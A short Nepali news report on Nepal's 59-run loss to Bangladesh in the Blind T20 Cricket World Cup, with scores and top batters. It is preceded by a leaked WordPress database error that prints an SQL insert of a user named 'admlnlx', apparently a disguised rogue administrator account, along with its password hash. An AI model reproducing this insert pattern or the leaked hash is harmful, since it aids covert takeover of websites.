WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfrtDKe8R94/1ImyNTd18NNgZZ1MBc.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 13:45:57', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १९ –
दृष्टिविहीन विश्वकप ट्वेन्टी ट्वेन्टी क्रिकटको दोस्रो खेलमा पनि नेपाल पराजित भएको छ । नेपाल बुधबार बंगलादेशसँग ५९ रनले पराजित भएको हो । बंगलादेशले दिएको २ सय ४ रनको लक्ष्य पछ्याएको नेपालले निर्धारित ओभरमा ८ विकेटको क्षतिमा १ सय ४४ रन मात्र बनाउन सक्यो ।
नेपालका लागि सुनील सुवेदी क्षेत्रीले ५१ तथा सुनील थापा मगरले ३२ रन बनाए । पहिले ब्याटिङ गरेको बंगलादेशले निर्धारित २० ओभरमा २ विकेटको क्षतिमा २ सय ३ रन बनाएको थियो । उसका लागि मोसीन हुसेन जोयले ८८ तथा अब्दुल मलेकले ८३ रन बनाए ।
यसअघि नेपाल अष्ट्रेलियासँग १० विकेटले पराजित भएको थियो । नेपालले बिहीबार दक्षिण अफ्रिकासँग खेल्नेछ ।